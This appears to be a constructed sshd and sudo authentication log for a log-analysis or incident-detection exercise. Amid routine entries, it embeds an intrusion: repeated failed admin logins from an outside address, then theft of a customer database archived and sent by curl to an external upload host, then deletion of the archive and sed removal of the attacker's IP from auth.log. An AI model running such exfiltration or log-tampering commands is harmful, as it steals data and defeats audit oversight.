// Authentication log (sshd login events and sudo command records) showing login attempts and user actions Apr 08 08:12:05 server sshd[5231]: Accepted password for jsmith from 192.168.1.45 Apr 08 08:15:23 server sudo: jsmith : USER=jsmith ; COMMAND=/usr/bin/apt update Apr 08 09:23:41 server sshd[5267]: Accepted password for mwilson from 192.168.1.67 Apr 08 09:25:12 server sudo: mwilson : USER=mwilson ; COMMAND=/bin/cat /var/log/syslog Apr 08 10:02:19 server sshd[5295]: Accepted password for tjenkins from 192.168.1.89 Apr 08 10:05:34 server sudo: tjenkins : USER=tjenkins ; COMMAND=/usr/bin/find /home/tjenkins -name "*.doc" Apr 08 11:43:56 server sshd[5347]: Failed password for agarcia from 192.168.1.73 Apr 08 11:44:12 server sshd[5349]: Failed password for agarcia from 192.168.1.73 Apr 08 11:44:28 server sshd[5351]: Accepted password for agarcia from 192.168.1.73 Apr 08 12:32:15 server sshd[5478]: Accepted password for jsmith from 192.168.1.45 Apr 08 12:37:42 server sudo: jsmith : USER=jsmith ; COMMAND=/bin/ls -la /var/www/html Apr 08 13:14:23 server sshd[5517]: Accepted password for bthomas from 192.168.1.55 Apr 08 13:15:07 server sudo: bthomas : USER=bthomas ; COMMAND=/usr/bin/vim /home/bthomas/projects/notes.txt Apr 08 14:23:51 server sshd[5598]: Accepted password for slee from 192.168.1.91 Apr 08 14:26:18 server sudo: slee : USER=slee ; COMMAND=/bin/grep "error" /var/log/apache2/error.log Apr 08 15:45:22 server sshd[6025]: Accepted password for admin from 192.168.1.100 Apr 08 15:47:35 server sudo: admin : USER=root ; COMMAND=/usr/sbin/service apache2 restart Apr 08 16:12:04 server sshd[6102]: Accepted password for tjenkins from 192.168.1.89 Apr 08 16:15:21 server sudo: tjenkins : USER=tjenkins ; COMMAND=/bin/cp /home/tjenkins/report.pdf /shared/documents/ Apr 08 17:34:19 server sshd[6189]: Accepted password for agarcia from 192.168.1.73 Apr 08 17:36:42 server sudo: agarcia : USER=agarcia ; COMMAND=/usr/bin/du -sh /var/log Apr 08 18:21:37 server sshd[6256]: Accepted password for mwilson from 192.168.1.67 
Apr 08 18:22:59 server sudo: mwilson : USER=mwilson ; COMMAND=/bin/cat /etc/hosts Apr 08 19:03:12 server sshd[6301]: Failed password for unknown user from 203.0.113.17 Apr 08 19:03:27 server sshd[6303]: Failed password for unknown user from 203.0.113.17 Apr 08 19:45:33 server sshd[6345]: Accepted password for bthomas from 192.168.1.55 Apr 08 19:47:14 server sudo: bthomas : USER=bthomas ; COMMAND=/usr/bin/tail -f /var/log/syslog Apr 08 21:12:19 server sshd[6423]: Failed password for root from 45.132.192.14 Apr 08 21:12:33 server sshd[6425]: Failed password for root from 45.132.192.14 Apr 08 21:12:47 server sshd[6427]: Failed password for root from 45.132.192.14 Apr 08 22:34:51 server sshd[6489]: Accepted password for admin from 192.168.1.100 Apr 08 22:37:12 server sudo: admin : USER=root ; COMMAND=/usr/sbin/iptables -L Apr 08 23:15:47 server sshd[6544]: Failed password for admin from 198.51.100.72 Apr 08 23:17:12 server sshd[6547]: Failed password for admin from 198.51.100.72 Apr 08 23:18:36 server sshd[6551]: Failed password for admin from 198.51.100.72 Apr 08 23:19:45 server sshd[6553]: Accepted password for admin from 198.51.100.72 SUSPICIOUS_LOGIN_TIME Apr 08 23:23:19 server sudo: admin : USER=root ; COMMAND=/bin/ls -la /etc/ Apr 08 23:27:42 server sudo: admin : USER=root ; COMMAND=/bin/ls -la /home/ Apr 09 00:12:35 server sudo: admin : USER=root ; COMMAND=/usr/bin/find /home -type f -name "*.xlsx" -o -name "*.csv" Apr 09 00:47:21 server sudo: admin : USER=root ; COMMAND=/bin/cat /etc/passwd Apr 09 01:15:41 server sudo: admin : USER=root ; COMMAND=/bin/tar -czvf /tmp/secret_archive.tar.gz customer_database.xlsx Apr 09 01:17:28 server sudo: admin : USER=root ; COMMAND=/usr/bin/curl -F "file=@/tmp/secret_archive.tar.gz" https://file-drop.competitor.com/upload Apr 09 01:23:14 server sudo: admin : USER=root ; COMMAND=/bin/rm /tmp/secret_archive.tar.gz Apr 09 01:38:42 server sudo: admin : USER=root ; COMMAND=/usr/bin/find /var/log -type f -name "auth.log*" -exec grep 
-l "198.51.100.72" {} \; Apr 09 01:42:17 server sudo: admin : USER=root ; COMMAND=/usr/bin/sed -i '/198\.51\.100\.72/d' /var/log/auth.log.1 Apr 09 02:35:19 server sshd[6780]: Disconnected from user admin 198.51.100.72 Apr 09 07:23:45 server sshd[6923]: Accepted password for slee from 192.168.1.91 Apr 09 07:25:31 server sudo: slee : USER=slee ; COMMAND=/usr/bin/systemctl status apache2 Apr 09 08:03:19 server sshd[6978]: Failed password for mwilson from 192.168.1.67 Apr 09 08:03:32 server sshd[6980]: Accepted password for mwilson from 192.168.1.67 Apr 09 08:45:12 server sshd[7012]: Accepted password for jsmith from 192.168.1.45 Apr 09 08:47:23 server sudo: jsmith : USER=jsmith ; COMMAND=/bin/ls -la /home/jsmith/documents Apr 09 09:12:37 server sshd[7056]: Accepted password for tjenkins from 192.168.1.89 Apr 09 09:14:12 server sudo: tjenkins : USER=tjenkins ; COMMAND=/usr/bin/top